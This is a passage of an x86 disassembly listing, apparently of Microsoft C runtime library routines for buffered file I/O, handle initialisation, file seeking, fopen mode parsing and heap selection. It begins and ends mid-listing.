mov esi, [esp+4+arg_0]
mov eax, [esi+0Ch]
test al, 83h
jz short loc_4266ED
test al, 8
jz short loc_4266ED
push dword ptr [esi+8]
call sub_4230B3
and word ptr [esi+0Ch], 0FBF7h
xor eax, eax
pop ecx
mov [esi], eax
mov [esi+8], eax
mov [esi+4], eax
loc_4266ED: ; CODE XREF: sub_4266C4+A�j
; sub_4266C4+E�j
pop esi
retn
sub_4266C4 endp
; =============== S U B R O U T I N E =======================================
sub_4266EF proc near ; CODE XREF: sub_426782+4C�p
; sub_426782+67�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push esi
call sub_42671D
test eax, eax
pop ecx
jz short loc_426704
or eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_426704: ; CODE XREF: sub_4266EF+E�j
test byte ptr [esi+0Dh], 40h
jz short loc_426719
push dword ptr [esi+10h]
call sub_42BF07
neg eax
pop ecx
pop esi
sbb eax, eax
retn
; ---------------------------------------------------------------------------
loc_426719: ; CODE XREF: sub_4266EF+19�j
xor eax, eax
pop esi
retn
sub_4266EF endp
; =============== S U B R O U T I N E =======================================
sub_42671D proc near ; CODE XREF: sub_422B96+10�p
; sub_422EA8+37�p ...
arg_0 = dword ptr 4
push ebx
push esi
mov esi, [esp+8+arg_0]
xor ebx, ebx
push edi
mov eax, [esi+0Ch]
mov ecx, eax
and ecx, 3
cmp cl, 2
jnz short loc_42676A
test ax, 108h
jz short loc_42676A
mov eax, [esi+8]
mov edi, [esi]
sub edi, eax
test edi, edi
jle short loc_42676A
push edi
push eax
push dword ptr [esi+10h]
call sub_42AE6D
add esp, 0Ch
cmp eax, edi
jnz short loc_426763
mov eax, [esi+0Ch]
test al, 80h
jz short loc_42676A
and al, 0FDh
mov [esi+0Ch], eax
jmp short loc_42676A
; ---------------------------------------------------------------------------
loc_426763: ; CODE XREF: sub_42671D+36�j
or dword ptr [esi+0Ch], 20h
or ebx, 0FFFFFFFFh
loc_42676A: ; CODE XREF: sub_42671D+14�j
; sub_42671D+1A�j ...
mov eax, [esi+8]
and dword ptr [esi+4], 0
mov [esi], eax
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_42671D endp
; =============== S U B R O U T I N E =======================================
sub_426779 proc near ; CODE XREF: sub_424828�p
push 1
call sub_426782
pop ecx
retn
sub_426779 endp
; =============== S U B R O U T I N E =======================================
sub_426782 proc near ; CODE XREF: sub_426779+2�p
arg_0 = dword ptr 4
push ebx
push esi
push edi
push 2
xor ebx, ebx
xor edi, edi
call sub_428436
xor esi, esi
pop ecx
cmp dword_632B00, esi
jle short loc_42680F
loc_42679B: ; CODE XREF: sub_426782+8B�j
mov eax, dword_631AE8
mov eax, [eax+esi*4]
test eax, eax
jz short loc_426806
test byte ptr [eax+0Ch], 83h
jz short loc_426806
push eax
push esi
call sub_42486B
mov eax, dword_631AE8
pop ecx
pop ecx
mov eax, [eax+esi*4]
mov ecx, [eax+0Ch]
test cl, 83h
jz short loc_4267F6
cmp [esp+0Ch+arg_0], 1
jnz short loc_4267DC
push eax
call sub_4266EF
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_4267F6
inc ebx
jmp short loc_4267F6
; ---------------------------------------------------------------------------
loc_4267DC: ; CODE XREF: sub_426782+49�j
cmp [esp+0Ch+arg_0], 0
jnz short loc_4267F6
test cl, 2
jz short loc_4267F6
push eax
call sub_4266EF
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_4267F6
or edi, eax
loc_4267F6: ; CODE XREF: sub_426782+42�j
; sub_426782+55�j ...
mov eax, dword_631AE8
push dword ptr [eax+esi*4]
push esi
call sub_4248BD
pop ecx
pop ecx
loc_426806: ; CODE XREF: sub_426782+23�j
; sub_426782+29�j
inc esi
cmp esi, dword_632B00
jl short loc_42679B
loc_42680F: ; CODE XREF: sub_426782+17�j
push 2
call sub_428497
cmp [esp+10h+arg_0], 1
pop ecx
mov eax, ebx
jz short loc_426822
mov eax, edi
loc_426822: ; CODE XREF: sub_426782+9C�j
pop edi
pop esi
pop ebx
retn
sub_426782 endp
; =============== S U B R O U T I N E =======================================
sub_426826 proc near ; CODE XREF: sub_422C11+A9�p
; sub_42458A+34�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+0Ch]
test al, 83h
jz loc_4268FD
test al, 40h
jnz loc_4268FD
test al, 2
jz short loc_42684C
or al, 20h
mov [esi+0Ch], eax
jmp loc_4268FD
; ---------------------------------------------------------------------------
loc_42684C: ; CODE XREF: sub_426826+1A�j
or al, 1
test ax, 10Ch
mov [esi+0Ch], eax
jnz short loc_426860
push esi
call sub_42B7F1
pop ecx
jmp short loc_426865
; ---------------------------------------------------------------------------
loc_426860: ; CODE XREF: sub_426826+2F�j
mov eax, [esi+8]
mov [esi], eax
loc_426865: ; CODE XREF: sub_426826+38�j
push dword ptr [esi+18h]
push dword ptr [esi+8]
push dword ptr [esi+10h]
call sub_426902
add esp, 0Ch
mov [esi+4], eax
test eax, eax
jz short loc_4268EC
cmp eax, 0FFFFFFFFh
jz short loc_4268EC
mov edx, [esi+0Ch]
test dl, 82h
jnz short loc_4268C1
mov ecx, [esi+10h]
push edi
cmp ecx, 0FFFFFFFFh
jz short loc_4268AA
mov edi, ecx
sar edi, 5
and ecx, 1Fh
mov edi, dword_6319E0[edi*4]
lea ecx, [ecx+ecx*8]
lea edi, [edi+ecx*4]
jmp short loc_4268AF
; ---------------------------------------------------------------------------
loc_4268AA: ; CODE XREF: sub_426826+6B�j
mov edi, offset dword_449A50
loc_4268AF: ; CODE XREF: sub_426826+82�j
mov cl, [edi+4]
pop edi
and cl, 82h
cmp cl, 82h
jnz short loc_4268C1
or dh, 20h
mov [esi+0Ch], edx
loc_4268C1: ; CODE XREF: sub_426826+62�j
; sub_426826+93�j
cmp dword ptr [esi+18h], 200h
jnz short loc_4268DE
mov ecx, [esi+0Ch]
test cl, 8
jz short loc_4268DE
test ch, 4
jnz short loc_4268DE
mov dword ptr [esi+18h], 1000h
loc_4268DE: ; CODE XREF: sub_426826+A2�j
; sub_426826+AA�j ...
mov ecx, [esi]
dec eax
mov [esi+4], eax
movzx eax, byte ptr [ecx]
inc ecx
mov [esi], ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_4268EC: ; CODE XREF: sub_426826+55�j
; sub_426826+5A�j
neg eax
sbb eax, eax
and eax, 10h
add eax, 10h
or [esi+0Ch], eax
and dword ptr [esi+4], 0
loc_4268FD: ; CODE XREF: sub_426826+A�j
; sub_426826+12�j ...
or eax, 0FFFFFFFFh
pop esi
retn
sub_426826 endp
; =============== S U B R O U T I N E =======================================
sub_426902 proc near ; CODE XREF: sub_422C11+90�p
; sub_426826+48�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
cmp esi, dword_631AE0
jnb short loc_42694F
mov ecx, esi
mov eax, esi
sar ecx, 5
and eax, 1Fh
mov ecx, dword_6319E0[ecx*4]
lea eax, [eax+eax*8]
test byte ptr [ecx+eax*4+4], 1
jz short loc_42694F
push edi
push esi
call sub_42BE86
push [esp+0Ch+arg_8]
push [esp+10h+arg_4]
push esi
call sub_426967
push esi
mov edi, eax
call sub_42BEE5
add esp, 14h
mov eax, edi
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_42694F: ; CODE XREF: sub_426902+B�j
; sub_426902+26�j
call sub_426528
mov dword ptr [eax], 9
call sub_426531
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
pop esi
retn
sub_426902 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426967 proc near ; CODE XREF: sub_426902+38�p
; sub_42BF9A+274�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
and [ebp+var_8], 0
cmp [ebp+arg_8], 0
push ebx
mov ebx, [ebp+arg_4]
push esi
push edi
mov edx, ebx
jz loc_426B39
mov eax, [ebp+arg_0]
mov ecx, eax
and eax, 1Fh
sar ecx, 5
lea esi, [eax+eax*8]
mov eax, dword_6319E0[ecx*4]
lea edi, ds:6319E0h[ecx*4]
shl esi, 2
add eax, esi
mov cl, [eax+4]
test cl, 2
jnz loc_426B39
test cl, 48h
jz short loc_4269D2
mov al, [eax+5]
cmp al, 0Ah
jz short loc_4269D2
dec [ebp+arg_8]
mov [ebx], al
mov eax, [edi]
lea edx, [ebx+1]
mov [ebp+var_8], 1
mov byte ptr [eax+esi+5], 0Ah
loc_4269D2: ; CODE XREF: sub_426967+4C�j
; sub_426967+53�j
lea eax, [ebp+var_C]
push 0
push eax
mov eax, [edi]
push [ebp+arg_8]
push edx
push dword ptr [eax+esi]
call dword_42F054 ; ReadFile
test eax, eax
jnz short loc_426A24
call dword_42F068 ; RtlGetLastWin32Error
push 5
pop esi
cmp eax, esi
jnz short loc_426A0C
call sub_426528
mov dword ptr [eax], 9
call sub_426531
mov [eax], esi
jmp short loc_426A1C
; ---------------------------------------------------------------------------
loc_426A0C: ; CODE XREF: sub_426967+8F�j
cmp eax, 6Dh
jz loc_426B39
push eax
call sub_4264B5
pop ecx
loc_426A1C: ; CODE XREF: sub_426967+A3�j
or eax, 0FFFFFFFFh
jmp loc_426B3B
; ---------------------------------------------------------------------------
loc_426A24: ; CODE XREF: sub_426967+82�j
mov eax, [edi]
mov edx, [ebp+var_C]
add [ebp+var_8], edx
lea ecx, [eax+esi+4]
mov al, [eax+esi+4]
test al, 80h
jz loc_426B34
test edx, edx
jz short loc_426A49
cmp byte ptr [ebx], 0Ah
jnz short loc_426A49
or al, 4
jmp short loc_426A4B
; ---------------------------------------------------------------------------
loc_426A49: ; CODE XREF: sub_426967+D7�j
; sub_426967+DC�j
and al, 0FBh
loc_426A4B: ; CODE XREF: sub_426967+E0�j
mov [ecx], al
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_8]
mov [ebp+arg_8], eax
add ecx, eax
cmp eax, ecx
mov [ebp+var_8], ecx
jnb loc_426B2E
loc_426A63: ; CODE XREF: sub_426967+1AF�j
mov eax, [ebp+arg_8]
mov al, [eax]
cmp al, 1Ah
jz loc_426B1E
cmp al, 0Dh
jz short loc_426A7F
mov [ebx], al
inc ebx
inc [ebp+arg_8]
jmp loc_426B10
; ---------------------------------------------------------------------------
loc_426A7F: ; CODE XREF: sub_426967+10B�j
dec ecx
cmp [ebp+arg_8], ecx
jnb short loc_426A9D
mov eax, [ebp+arg_8]
inc eax
cmp byte ptr [eax], 0Ah
jnz short loc_426A94
add [ebp+arg_8], 2
jmp short loc_426AF2
; ---------------------------------------------------------------------------
loc_426A94: ; CODE XREF: sub_426967+125�j
mov byte ptr [ebx], 0Dh
inc ebx
mov [ebp+arg_8], eax
jmp short loc_426B10
; ---------------------------------------------------------------------------
loc_426A9D: ; CODE XREF: sub_426967+11C�j
lea eax, [ebp+var_C]
push 0
push eax
inc [ebp+arg_8]
lea eax, [ebp+var_1]
push 1
push eax
mov eax, [edi]
push dword ptr [eax+esi]
call dword_42F054 ; ReadFile
test eax, eax
jnz short loc_426AC5
call dword_42F068 ; RtlGetLastWin32Error
test eax, eax
jnz short loc_426B0C
loc_426AC5: ; CODE XREF: sub_426967+152�j
cmp [ebp+var_C], 0
jz short loc_426B0C
mov eax, [edi]
test byte ptr [eax+esi+4], 48h
jz short loc_426AE7
mov al, [ebp+var_1]
cmp al, 0Ah
jz short loc_426AF2
mov byte ptr [ebx], 0Dh
mov ecx, [edi]
inc ebx
mov [ecx+esi+5], al
jmp short loc_426B10
; ---------------------------------------------------------------------------
loc_426AE7: ; CODE XREF: sub_426967+16B�j
cmp ebx, [ebp+arg_4]
jnz short loc_426AF7
cmp [ebp+var_1], 0Ah
jnz short loc_426AF7
loc_426AF2: ; CODE XREF: sub_426967+12B�j
; sub_426967+172�j
mov byte ptr [ebx], 0Ah
jmp short loc_426B0F
; ---------------------------------------------------------------------------
loc_426AF7: ; CODE XREF: sub_426967+183�j
; sub_426967+189�j
push 1
push 0FFFFFFFFh
push [ebp+arg_0]
call sub_426D61
add esp, 0Ch
cmp [ebp+var_1], 0Ah
jz short loc_426B10
loc_426B0C: ; CODE XREF: sub_426967+15C�j
; sub_426967+162�j
mov byte ptr [ebx], 0Dh
loc_426B0F: ; CODE XREF: sub_426967+18E�j
inc ebx
loc_426B10: ; CODE XREF: sub_426967+113�j
; sub_426967+134�j ...
mov ecx, [ebp+var_8]
cmp [ebp+arg_8], ecx
jb loc_426A63
jmp short loc_426B2E
; ---------------------------------------------------------------------------
loc_426B1E: ; CODE XREF: sub_426967+103�j
mov eax, [edi]
lea esi, [eax+esi+4]
mov al, [esi]
test al, 40h
jnz short loc_426B2E
or al, 2
mov [esi], al
loc_426B2E: ; CODE XREF: sub_426967+F6�j
; sub_426967+1B5�j ...
sub ebx, [ebp+arg_4]
mov [ebp+var_8], ebx
loc_426B34: ; CODE XREF: sub_426967+CF�j
mov eax, [ebp+var_8]
jmp short loc_426B3B
; ---------------------------------------------------------------------------
loc_426B39: ; CODE XREF: sub_426967+16�j
; sub_426967+43�j ...
xor eax, eax
loc_426B3B: ; CODE XREF: sub_426967+B8�j
; sub_426967+1D0�j
pop edi
pop esi
pop ebx
leave
retn
sub_426967 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426B40 proc near ; CODE XREF: .text:00424F44�p
var_48 = byte ptr -48h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 48h
push ebx
push esi
push edi
push 480h
call sub_422F79
mov esi, eax
pop ecx
test esi, esi
jnz short loc_426B62
push 1Bh
call sub_424FCB
pop ecx
loc_426B62: ; CODE XREF: sub_426B40+18�j
mov dword_6319E0, esi
mov dword_631AE0, 20h
lea eax, [esi+480h]
loc_426B78: ; CODE XREF: sub_426B40+58�j
cmp esi, eax
jnb short loc_426B9A
and byte ptr [esi+4], 0
or dword ptr [esi], 0FFFFFFFFh
and dword ptr [esi+8], 0
mov byte ptr [esi+5], 0Ah
mov eax, dword_6319E0
add esi, 24h
add eax, 480h
jmp short loc_426B78
; ---------------------------------------------------------------------------
loc_426B9A: ; CODE XREF: sub_426B40+3A�j
lea eax, [ebp+var_48]
push eax
call dword_42F210 ; GetStartupInfoA
cmp [ebp+var_16], 0
jz loc_426C80
mov eax, [ebp+var_14]
test eax, eax
jz loc_426C80
mov edi, [eax]
lea ebx, [eax+4]
lea eax, [ebx+edi]
mov [ebp+var_4], eax
mov eax, 800h
cmp edi, eax
jl short loc_426BD0
mov edi, eax
loc_426BD0: ; CODE XREF: sub_426B40+8C�j
cmp dword_631AE0, edi
jge short loc_426C2E
mov esi, offset dword_6319E4
loc_426BDD: ; CODE XREF: sub_426B40+E4�j
push 480h
call sub_422F79
test eax, eax
pop ecx
jz short loc_426C28
add dword_631AE0, 20h
mov [esi], eax
lea ecx, [eax+480h]
loc_426BFB: ; CODE XREF: sub_426B40+D9�j
cmp eax, ecx
jnb short loc_426C1B
and byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
and dword ptr [eax+8], 0
mov byte ptr [eax+5], 0Ah
mov ecx, [esi]
add eax, 24h
add ecx, 480h
jmp short loc_426BFB
; ---------------------------------------------------------------------------
loc_426C1B: ; CODE XREF: sub_426B40+BD�j
add esi, 4
cmp dword_631AE0, edi
jl short loc_426BDD
jmp short loc_426C2E
; ---------------------------------------------------------------------------
loc_426C28: ; CODE XREF: sub_426B40+AA�j
mov edi, dword_631AE0
loc_426C2E: ; CODE XREF: sub_426B40+96�j
; sub_426B40+E6�j
xor esi, esi
test edi, edi
jle short loc_426C80
loc_426C34: ; CODE XREF: sub_426B40+13E�j
mov eax, [ebp+var_4]
mov ecx, [eax]
cmp ecx, 0FFFFFFFFh
jz short loc_426C76
mov al, [ebx]
test al, 1
jz short loc_426C76
test al, 8
jnz short loc_426C53
push ecx
call dword_42F1D0 ; GetFileType
test eax, eax
jz short loc_426C76
loc_426C53: ; CODE XREF: sub_426B40+106�j
mov ecx, esi
mov eax, esi
sar ecx, 5
and eax, 1Fh
mov ecx, dword_6319E0[ecx*4]
lea eax, [eax+eax*8]
lea eax, [ecx+eax*4]
mov ecx, [ebp+var_4]
mov ecx, [ecx]
mov [eax], ecx
mov cl, [ebx]
mov [eax+4], cl
loc_426C76: ; CODE XREF: sub_426B40+FC�j
; sub_426B40+102�j ...
add [ebp+var_4], 4
inc esi
inc ebx
cmp esi, edi
jl short loc_426C34
loc_426C80: ; CODE XREF: sub_426B40+69�j
; sub_426B40+74�j ...
xor ebx, ebx
loc_426C82: ; CODE XREF: sub_426B40+1A9�j
mov ecx, dword_6319E0
lea eax, [ebx+ebx*8]
cmp dword ptr [ecx+eax*4], 0FFFFFFFFh
lea esi, [ecx+eax*4]
jnz short loc_426CE1
test ebx, ebx
mov byte ptr [esi+4], 81h
jnz short loc_426CA1
push 0FFFFFFF6h
pop eax
jmp short loc_426CAB
; ---------------------------------------------------------------------------
loc_426CA1: ; CODE XREF: sub_426B40+15A�j
mov eax, ebx
dec eax
neg eax
sbb eax, eax
add eax, 0FFFFFFF5h
loc_426CAB: ; CODE XREF: sub_426B40+15F�j
push eax
call dword_42F1D4 ; GetStdHandle
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_426CD0
push edi
call dword_42F1D0 ; GetFileType
test eax, eax
jz short loc_426CD0
and eax, 0FFh
mov [esi], edi
cmp eax, 2
jnz short loc_426CD6
loc_426CD0: ; CODE XREF: sub_426B40+177�j
; sub_426B40+182�j
or byte ptr [esi+4], 40h
jmp short loc_426CE5
; ---------------------------------------------------------------------------
loc_426CD6: ; CODE XREF: sub_426B40+18E�j
cmp eax, 3
jnz short loc_426CE5
or byte ptr [esi+4], 8
jmp short loc_426CE5
; ---------------------------------------------------------------------------
loc_426CE1: ; CODE XREF: sub_426B40+152�j
or byte ptr [esi+4], 80h
loc_426CE5: ; CODE XREF: sub_426B40+194�j
; sub_426B40+199�j ...
inc ebx
cmp ebx, 3
jl short loc_426C82
push dword_631AE0
call dword_42F1D8 ; SetHandleCount
pop edi
pop esi
pop ebx
leave
retn
sub_426B40 endp
; =============== S U B R O U T I N E =======================================
sub_426CFC proc near ; CODE XREF: sub_422D1B+20�p
; sub_422D1B+EB�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
cmp esi, dword_631AE0
jnb short loc_426D49
mov ecx, esi
mov eax, esi
sar ecx, 5
and eax, 1Fh
mov ecx, dword_6319E0[ecx*4]
lea eax, [eax+eax*8]
test byte ptr [ecx+eax*4+4], 1
jz short loc_426D49
push edi
push esi
call sub_42BE86
push [esp+0Ch+arg_8]
push [esp+10h+arg_4]
push esi
call sub_426D61
push esi
mov edi, eax
call sub_42BEE5
add esp, 14h
mov eax, edi
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_426D49: ; CODE XREF: sub_426CFC+B�j
; sub_426CFC+26�j
call sub_426528
mov dword ptr [eax], 9
call sub_426531
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
pop esi
retn
sub_426CFC endp
; =============== S U B R O U T I N E =======================================
sub_426D61 proc near ; CODE XREF: sub_426967+197�p
; sub_426CFC+38�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
push edi
push esi
call sub_42BE44
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_426D80
call sub_426528
mov dword ptr [eax], 9
jmp short loc_426DAD
; ---------------------------------------------------------------------------
loc_426D80: ; CODE XREF: sub_426D61+10�j
push [esp+8+arg_8]
push 0
push [esp+10h+arg_4]
push eax
call dword_42F058 ; SetFilePointer
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_426DA0
call dword_42F068 ; RtlGetLastWin32Error
jmp short loc_426DA2
; ---------------------------------------------------------------------------
loc_426DA0: ; CODE XREF: sub_426D61+35�j
xor eax, eax
loc_426DA2: ; CODE XREF: sub_426D61+3D�j
test eax, eax
jz short loc_426DB2
push eax
call sub_4264B5
pop ecx
loc_426DAD: ; CODE XREF: sub_426D61+1D�j
or eax, 0FFFFFFFFh
jmp short loc_426DD1
; ---------------------------------------------------------------------------
loc_426DB2: ; CODE XREF: sub_426D61+43�j
mov ecx, esi
and esi, 1Fh
sar ecx, 5
mov eax, esi
mov ecx, dword_6319E0[ecx*4]
lea eax, [eax+eax*8]
and byte ptr [ecx+eax*4+4], 0FDh
lea eax, [ecx+eax*4+4]
mov eax, edi
loc_426DD1: ; CODE XREF: sub_426D61+4F�j
pop edi
pop esi
retn
sub_426D61 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426DD4 proc near ; CODE XREF: sub_422F35+1C�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, dword_6315FC
push edi
mov edi, [ebp+arg_4]
xor ebx, ebx
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
mov al, [edi]
cmp al, 61h
jz short loc_426E0D
cmp al, 72h
jz short loc_426E06
cmp al, 77h
jnz loc_426F21
mov ecx, 301h
jmp short loc_426E12
; ---------------------------------------------------------------------------
loc_426E06: ; CODE XREF: sub_426DD4+21�j
xor ecx, ecx
or esi, 1
jmp short loc_426E15
; ---------------------------------------------------------------------------
loc_426E0D: ; CODE XREF: sub_426DD4+1D�j
mov ecx, 109h
loc_426E12: ; CODE XREF: sub_426DD4+30�j
or esi, 2
loc_426E15: ; CODE XREF: sub_426DD4+37�j
push 1
pop edx
loc_426E18: ; CODE XREF: sub_426DD4+8B�j
; sub_426DD4+A0�j ...
mov al, [edi+1]
inc edi
cmp al, bl
jz loc_426F07
cmp edx, ebx
jz loc_426F07
movsx eax, al
cmp eax, 54h
jg short loc_426EA6
jz short loc_426E96
sub eax, 2Bh
jz short loc_426E80
sub eax, 19h
jz short loc_426E76
sub eax, 0Eh
jz short loc_426E61
dec eax
jnz loc_426EF8
cmp [ebp+var_4], ebx
jnz loc_426EF8
mov [ebp+var_4], 1
or ecx, 20h
jmp short loc_426E18
; ---------------------------------------------------------------------------
loc_426E61: ; CODE XREF: sub_426DD4+6F�j
cmp [ebp+var_4], ebx
jnz loc_426EF8
mov [ebp+var_4], 1
or ecx, 10h
jmp short loc_426E18
; ---------------------------------------------------------------------------
loc_426E76: ; CODE XREF: sub_426DD4+6A�j
test cl, 40h
jnz short loc_426EF8
or ecx, 40h
jmp short loc_426E18
; ---------------------------------------------------------------------------
loc_426E80: ; CODE XREF: sub_426DD4+65�j
test cl, 2
jnz short loc_426EF8
and ecx, 0FFFFFFFEh
and esi, 0FFFFFFFCh
or ecx, 2
or esi, 80h
jmp short loc_426E18
; ---------------------------------------------------------------------------
loc_426E96: ; CODE XREF: sub_426DD4+60�j
mov eax, 1000h
test ecx, eax
jnz short loc_426EF8
or ecx, eax
jmp loc_426E18
; ---------------------------------------------------------------------------
loc_426EA6: ; CODE XREF: sub_426DD4+5E�j
sub eax, 62h
jz short loc_426EF3
dec eax
jz short loc_426EDC
sub eax, 0Bh
jz short loc_426EC5
sub eax, 6
jnz short loc_426EF8
test ch, 0C0h
jnz short loc_426EF8
or ch, 40h
jmp loc_426E18
; ---------------------------------------------------------------------------
loc_426EC5: ; CODE XREF: sub_426DD4+DD�j
cmp [ebp+var_8], ebx
jnz short loc_426EF8
mov [ebp+var_8], 1
and esi, 0FFFFBFFFh
jmp loc_426E18
; ---------------------------------------------------------------------------
loc_426EDC: ; CODE XREF: sub_426DD4+D8�j
cmp [ebp+var_8], ebx
jnz short loc_426EF8
mov [ebp+var_8], 1
or esi, 4000h
jmp loc_426E18
; ---------------------------------------------------------------------------
loc_426EF3: ; CODE XREF: sub_426DD4+D5�j
test ch, 0C0h
jz short loc_426EFF
loc_426EF8: ; CODE XREF: sub_426DD4+72�j
; sub_426DD4+7B�j ...
xor edx, edx
jmp loc_426E18
; ---------------------------------------------------------------------------
loc_426EFF: ; CODE XREF: sub_426DD4+122�j
or ch, 80h
jmp loc_426E18
; ---------------------------------------------------------------------------
loc_426F07: ; CODE XREF: sub_426DD4+4A�j
; sub_426DD4+52�j
push 1A4h
push [ebp+arg_8]
push ecx
push [ebp+arg_0]
call sub_42BF9A
mov ecx, eax
add esp, 10h
cmp ecx, ebx
jge short loc_426F25
loc_426F21: ; CODE XREF: sub_426DD4+25�j
xor eax, eax
jmp short loc_426F3F
; ---------------------------------------------------------------------------
loc_426F25: ; CODE XREF: sub_426DD4+14B�j
mov eax, [ebp+arg_C]
inc dword_6313E8
mov [eax+0Ch], esi
mov [eax+4], ebx
mov [eax], ebx
mov [eax+8], ebx
mov [eax+1Ch], ebx
mov [eax+10h], ecx
loc_426F3F: ; CODE XREF: sub_426DD4+14F�j
pop edi
pop esi
pop ebx
leave
retn
sub_426DD4 endp
; =============== S U B R O U T I N E =======================================
sub_426F44 proc near ; CODE XREF: sub_422F35+1�p
push ebx
push esi
push edi
push 2
xor ebx, ebx
xor edi, edi
call sub_428436
xor esi, esi
cmp dword_632B00, ebx
pop ecx
jle loc_426FFE
loc_426F61: ; CODE XREF: sub_426F44+57�j
mov eax, dword_631AE8
mov eax, [eax+esi*4]
cmp eax, ebx
jz short loc_426FA4
test byte ptr [eax+0Ch], 83h
jnz short loc_426F94
push eax
push esi
call sub_42486B
pop ecx
pop ecx
mov ecx, dword_631AE8
mov eax, [ecx+esi*4]
test byte ptr [eax+0Ch], 83h
jz short loc_426F9F
push eax
push esi
call sub_4248BD
pop ecx
pop ecx
loc_426F94: ; CODE XREF: sub_426F44+2D�j
inc esi
cmp esi, dword_632B00
jl short loc_426F61
jmp short loc_426FFE
; ---------------------------------------------------------------------------
loc_426F9F: ; CODE XREF: sub_426F44+45�j
mov edi, [ecx+esi*4]
jmp short loc_426FE8
; ---------------------------------------------------------------------------
loc_426FA4: ; CODE XREF: sub_426F44+27�j
push 38h
shl esi, 2
call sub_422F79
pop ecx
mov ecx, dword_631AE8
mov [esi+ecx], eax
mov eax, dword_631AE8
mov eax, [esi+eax]
cmp eax, ebx
jz short loc_426FFE
add eax, 20h
push eax
call dword_42F1CC ; InitializeCriticalSection
mov eax, dword_631AE8
mov eax, [esi+eax]
add eax, 20h
push eax
call dword_42F140 ; RtlEnterCriticalSection
mov eax, dword_631AE8
mov edi, [esi+eax]
loc_426FE8: ; CODE XREF: sub_426F44+5E�j
cmp edi, ebx
jz short loc_426FFE
or dword ptr [edi+10h], 0FFFFFFFFh
mov [edi+4], ebx
mov [edi+0Ch], ebx
mov [edi+8], ebx
mov [edi], ebx
mov [edi+1Ch], ebx
loc_426FFE: ; CODE XREF: sub_426F44+17�j
; sub_426F44+59�j ...
push 2
call sub_428497
pop ecx
mov eax, edi
pop edi
pop esi
pop ebx
retn
sub_426F44 endp
; =============== S U B R O U T I N E =======================================
sub_42700C proc near ; CODE XREF: sub_422F8B+1F�p
; sub_423F63+10D�p ...
arg_0 = dword ptr 4
mov eax, dword_6313FC
test eax, eax
jz short loc_427024
push [esp+arg_0]
call eax ; dword_6313FC
test eax, eax
pop ecx
jz short loc_427024
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_427024: ; CODE XREF: sub_42700C+7�j
; sub_42700C+12�j
xor eax, eax
retn
sub_42700C endp
; =============== S U B R O U T I N E =======================================
sub_427027 proc near ; CODE XREF: sub_427054+136�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push 0
and dword ptr [esi], 0
call dword_42F074 ; GetModuleHandleA
cmp word ptr [eax], 5A4Dh
jnz short loc_427052
mov ecx, [eax+3Ch]
test ecx, ecx
jz short loc_427052
add eax, ecx
mov cl, [eax+1Ah]
mov [esi], cl
mov al, [eax+1Bh]
mov [esi+1], al
loc_427052: ; CODE XREF: sub_427027+15�j
; sub_427027+1C�j
pop esi
retn
sub_427027 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427054 proc near ; CODE XREF: sub_42719C+20�p
var_122C = byte ptr -122Ch
var_19C = byte ptr -19Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_88 = dword ptr -88h
var_4 = byte ptr -4
push ebp
mov ebp, esp
mov eax, 122Ch
call sub_4220C0
lea eax, [ebp+var_98]
push ebx
push eax
mov [ebp+var_98], 94h
call dword_42F044 ; GetVersionExA
test eax, eax
jz short loc_427097
cmp [ebp+var_88], 2
jnz short loc_427097
cmp [ebp+var_94], 5
jb short loc_427097
push 1
pop eax
jmp loc_427199
; ---------------------------------------------------------------------------
loc_427097: ; CODE XREF: sub_427054+27�j
; sub_427054+30�j ...
lea eax, [ebp+var_122C]
push 1090h
push eax
push offset a__msvcrt_heap_ ; "__MSVCRT_HEAP_SELECT"
call dword_42F1C8 ; GetEnvironmentVariableA
test eax, eax
jz loc_427186
xor ebx, ebx
lea ecx, [ebp+var_122C]
cmp [ebp+var_122C], bl
jz short loc_4270D9
loc_4270C6: ; CODE XREF: sub_427054+83�j
mov al, [ecx]
cmp al, 61h
jl short loc_4270D4
cmp al, 7Ah
jg short loc_4270D4
sub al, 20h
mov [ecx], al
loc_4270D4: ; CODE XREF: sub_427054+76�j
; sub_427054+7A�j
inc ecx
cmp [ecx], bl
jnz short loc_4270C6
loc_4270D9: ; CODE XREF: sub_427054+70�j
lea eax, [ebp+var_122C]
